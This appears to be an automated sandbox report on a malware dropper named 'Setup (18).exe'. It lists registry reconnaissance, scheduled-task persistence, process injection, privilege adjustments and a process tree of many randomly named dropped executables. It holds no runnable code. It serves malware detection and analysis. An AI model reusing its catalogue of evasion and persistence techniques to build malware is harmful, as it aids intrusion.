WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString W3SGPRNzsnviCFwyWGjWU3KW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision W3SGPRNzsnviCFwyWGjWU3KW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cffV7V85xgfY_2SwymHpsGHL.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3260 schtasks.exe 3300 schtasks.exe 9916 schtasks.exe 9800 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 8468 timeout.exe 5524 timeout.exe 6056 timeout.exe -
Enumerates system info in registry 2 TTPs 27 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cffV7V85xgfY_2SwymHpsGHL.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cffV7V85xgfY_2SwymHpsGHL.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS W3SGPRNzsnviCFwyWGjWU3KW.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cffV7V85xgfY_2SwymHpsGHL.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU W3SGPRNzsnviCFwyWGjWU3KW.exe -
Kills process with taskkill 4 IoCs
pid Process 4940 taskkill.exe 7732 taskkill.exe 10820 taskkill.exe 7824 taskkill.exe -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 496 PING.EXE -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 179 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 443 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 524 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 89 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 165 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5088 Setup (18).exe 5088 Setup (18).exe 3024 WerFault.exe 3024 WerFault.exe 1632 WerFault.exe 1632 WerFault.exe 4980 cffV7V85xgfY_2SwymHpsGHL.exe 4980 cffV7V85xgfY_2SwymHpsGHL.exe 1456 WerFault.exe 1456 WerFault.exe 2068 WerFault.exe 2068 WerFault.exe 5100 J77cmUgJX0OQi4nZtiqUPG2L.exe 5100 J77cmUgJX0OQi4nZtiqUPG2L.exe 5100 J77cmUgJX0OQi4nZtiqUPG2L.exe 5100 J77cmUgJX0OQi4nZtiqUPG2L.exe 5100 J77cmUgJX0OQi4nZtiqUPG2L.exe 5100 J77cmUgJX0OQi4nZtiqUPG2L.exe 5100 J77cmUgJX0OQi4nZtiqUPG2L.exe 5100 J77cmUgJX0OQi4nZtiqUPG2L.exe 5528 WerFault.exe 5528 WerFault.exe 2848 cffV7V85xgfY_2SwymHpsGHL.exe 2848 cffV7V85xgfY_2SwymHpsGHL.exe 4644 WerFault.exe 4644 WerFault.exe 5088 WerFault.exe 5088 WerFault.exe 4448 WerFault.exe 4448 WerFault.exe 6276 cffV7V85xgfY_2SwymHpsGHL.exe 6276 cffV7V85xgfY_2SwymHpsGHL.exe 7060 WerFault.exe 7060 WerFault.exe 5824 msedge.exe 5824 msedge.exe 5824 msedge.exe 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe 5572 8975748.exe 5572 8975748.exe 1132 fA8YUw_bCw4n8NoOFcuKKYLJ.exe 1132 fA8YUw_bCw4n8NoOFcuKKYLJ.exe 7012 Setup.exe 7012 Setup.exe 7012 Setup.exe 7012 Setup.exe 7012 Setup.exe 7012 Setup.exe 7012 Setup.exe 7012 Setup.exe 3140 msedge.exe 3140 msedge.exe 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe 3540 cffV7V85xgfY_2SwymHpsGHL.exe 3540 cffV7V85xgfY_2SwymHpsGHL.exe 5704 6lSzGpKBNwPTtXTimMDJulCB.exe 5704 6lSzGpKBNwPTtXTimMDJulCB.exe 2160 wmiprvse.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
pid Process 5144 WinHoster.exe 2324 5752396.exe 6892 5999348.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
description pid Process Token: SeDebugPrivilege 1772 r89nXplmqQE5PqLkZO2pCalF.exe Token: SeDebugPrivilege 3204 Qy6qE9ZI7Djrb_apEAlf61NL.exe Token: SeRestorePrivilege 1632 WerFault.exe Token: SeBackupPrivilege 1632 WerFault.exe Token: SeBackupPrivilege 1632 WerFault.exe Token: SeDebugPrivilege 4940 taskkill.exe Token: SeDebugPrivilege 2160 wmiprvse.exe Token: SeDebugPrivilege 3540 cffV7V85xgfY_2SwymHpsGHL.exe Token: SeDebugPrivilege 5572 8975748.exe Token: SeDebugPrivilege 5704 6lSzGpKBNwPTtXTimMDJulCB.exe Token: SeDebugPrivilege 1132 fA8YUw_bCw4n8NoOFcuKKYLJ.exe Token: SeDebugPrivilege 2316 AIIy1ibSgK26QPojGs_p89LL.exe Token: SeDebugPrivilege 1452 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe Token: SeDebugPrivilege 680 6lSzGpKBNwPTtXTimMDJulCB.exe Token: SeManageVolumePrivilege 4324 md8_8eus.exe Token: SeDebugPrivilege 1948 PBrowFile15.exe Token: SeDebugPrivilege 5532 2898793.exe Token: SeDebugPrivilege 6388 W3SGPRNzsnviCFwyWGjWU3KW.exe Token: SeDebugPrivilege 3084 LivelyScreenRecS3.0.exe Token: SeDebugPrivilege 5152 3479057.exe Token: SeDebugPrivilege 3156 5982993.exe Token: SeDebugPrivilege 4688 4534878.exe Token: SeDebugPrivilege 3492 6209719.exe Token: SeDebugPrivilege 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe Token: SeDebugPrivilege 5180 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe Token: SeDebugPrivilege 7688 7326841.exe Token: SeDebugPrivilege 7416 mshta.exe Token: SeDebugPrivilege 5868 lncqVKD1n8Hm65KL2PVGDQde.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3984 ikQKjhB4k6HEzP8ctwvkUexr.tmp 6576 stats.tmp 3140 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5088 wrote to memory of 1060 5088 Setup (18).exe 80 PID 5088 wrote to memory of 1060 5088 Setup (18).exe 80 PID 5088 wrote to memory of 1060 5088 Setup (18).exe 80 PID 5088 wrote to memory of 1492 5088 Setup (18).exe 96 PID 5088 wrote to memory of 1492 5088 Setup (18).exe 96 PID 5088 wrote to memory of 1492 5088 Setup (18).exe 96 PID 5088 wrote to memory of 1108 5088 Setup (18).exe 88 PID 5088 wrote to memory of 1108 5088 Setup (18).exe 88 PID 5088 wrote to memory of 1108 5088 Setup (18).exe 88 PID 5088 wrote to memory of 1156 5088 Setup (18).exe 87 PID 5088 wrote to memory of 1156 5088 Setup (18).exe 87 PID 5088 wrote to memory of 1156 5088 Setup (18).exe 87 PID 5088 wrote to memory of 1704 5088 Setup (18).exe 95 PID 5088 wrote to memory of 1704 5088 Setup (18).exe 95 PID 5088 wrote to memory of 1704 5088 Setup (18).exe 95 PID 5088 wrote to memory of 3204 5088 Setup (18).exe 94 PID 5088 wrote to memory of 3204 5088 Setup (18).exe 94 PID 5088 wrote to memory of 1772 5088 Setup (18).exe 97 PID 5088 wrote to memory of 1772 5088 Setup (18).exe 97 PID 5088 wrote to memory of 1000 5088 Setup (18).exe 89 PID 5088 wrote to memory of 1000 5088 Setup (18).exe 89 PID 5088 wrote to memory of 468 5088 Setup (18).exe 91 PID 5088 wrote to memory of 468 5088 Setup (18).exe 91 PID 5088 wrote to memory of 468 5088 Setup (18).exe 91 PID 5088 wrote to memory of 680 5088 Setup (18).exe 90 PID 5088 wrote to memory of 680 5088 Setup (18).exe 90 PID 5088 wrote to memory of 680 5088 Setup (18).exe 90 PID 5088 wrote to memory of 1132 5088 Setup (18).exe 92 PID 5088 wrote to memory of 1132 5088 Setup (18).exe 92 PID 5088 wrote to memory of 1132 5088 Setup (18).exe 92 PID 5088 wrote to memory of 3196 5088 Setup (18).exe 93 PID 5088 wrote to memory of 3196 5088 Setup (18).exe 93 PID 5088 wrote to memory of 3196 5088 Setup (18).exe 93 PID 5088 wrote to memory of 1452 5088 Setup (18).exe 82 PID 5088 wrote to memory of 1452 5088 Setup (18).exe 82 PID 5088 wrote to memory of 1452 5088 Setup (18).exe 82 PID 5088 wrote to memory of 1360 5088 Setup (18).exe 83 PID 5088 wrote to memory of 1360 5088 Setup (18).exe 83 PID 5088 wrote to memory of 1360 5088 Setup (18).exe 83 PID 5088 wrote to memory of 1280 5088 Setup (18).exe 84 PID 5088 wrote to memory of 1280 5088 Setup (18).exe 84 PID 5088 wrote to memory of 1280 5088 Setup (18).exe 84 PID 5088 wrote to memory of 1196 5088 Setup (18).exe 81 PID 5088 wrote to memory of 1196 5088 Setup (18).exe 81 PID 5088 wrote to memory of 1196 5088 Setup (18).exe 81 PID 5088 wrote to memory of 1180 5088 Setup (18).exe 85 PID 5088 wrote to memory of 1180 5088 Setup (18).exe 85 PID 5088 wrote to memory of 1180 5088 Setup (18).exe 85 PID 5088 wrote to memory of 1168 5088 Setup (18).exe 98 PID 5088 wrote to memory of 1168 5088 Setup (18).exe 98 PID 5088 wrote to memory of 1168 5088 Setup (18).exe 98 PID 5088 wrote to memory of 1976 5088 Setup (18).exe 99 PID 5088 wrote to memory of 1976 5088 Setup (18).exe 99 PID 5088 wrote to memory of 1976 5088 Setup (18).exe 99 PID 5088 wrote to memory of 2136 5088 Setup (18).exe 100 PID 5088 wrote to memory of 2136 5088 Setup (18).exe 100 PID 5088 wrote to memory of 2136 5088 Setup (18).exe 100 PID 5088 wrote to memory of 2324 5088 Setup (18).exe 101 PID 5088 wrote to memory of 2324 5088 Setup (18).exe 101 PID 5088 wrote to memory of 2324 5088 Setup (18).exe 101 PID 5088 wrote to memory of 2536 5088 Setup (18).exe 102 PID 5088 wrote to memory of 2536 5088 Setup (18).exe 102 PID 5088 wrote to memory of 2536 5088 Setup (18).exe 102 PID 5088 wrote to memory of 1204 5088 Setup (18).exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Users\Admin\Documents\YNB1ySiHyFM9Z1eqrhee6Ulg.exe"C:\Users\Admin\Documents\YNB1ySiHyFM9Z1eqrhee6Ulg.exe"2⤵
- Executes dropped EXE
PID:1060
-
-
C:\Users\Admin\Documents\TamxLXMKExCKD_Z9p9V0UrUs.exe"C:\Users\Admin\Documents\TamxLXMKExCKD_Z9p9V0UrUs.exe"2⤵
- Executes dropped EXE
PID:1196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3024
-
-
-
C:\Users\Admin\Documents\6OUn4xmB6r0O7c3V5b7YH6lz.exe"C:\Users\Admin\Documents\6OUn4xmB6r0O7c3V5b7YH6lz.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1452
-
-
C:\Users\Admin\Documents\COBGICT1h3fxj2Ecl5f_phT6.exe"C:\Users\Admin\Documents\COBGICT1h3fxj2Ecl5f_phT6.exe"2⤵
- Executes dropped EXE
PID:1360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2068
-
-
-
C:\Users\Admin\Documents\ed5TJd6VV6OEfHKZtdS0STNO.exe"C:\Users\Admin\Documents\ed5TJd6VV6OEfHKZtdS0STNO.exe"2⤵
- Executes dropped EXE
PID:1280 -
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"3⤵
- Executes dropped EXE
PID:3472
-
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:4320
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 24124⤵
- Program crash
PID:16132
-
-
-
-
C:\Users\Admin\Documents\y2Ht6KicHQKo4tZc9FPphh08.exe"C:\Users\Admin\Documents\y2Ht6KicHQKo4tZc9FPphh08.exe"2⤵
- Executes dropped EXE
PID:1180
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe"C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1204 -
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵
- Executes dropped EXE
PID:1736
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵
- Executes dropped EXE
PID:2396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5528
-
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵
- Executes dropped EXE
PID:5308
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵
- Executes dropped EXE
PID:6128
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵
- Executes dropped EXE
PID:6000
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:5568
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:3232
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:5128
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:4260
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:2956
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6352
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6920
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:1892
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7128
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6632
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:5988
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7612
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7440
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7312
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8624
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7176
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9204
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8756
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:836
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9872
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9532 -s 284⤵
- Program crash
PID:4992
-
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5704
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8492
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9648
-
-
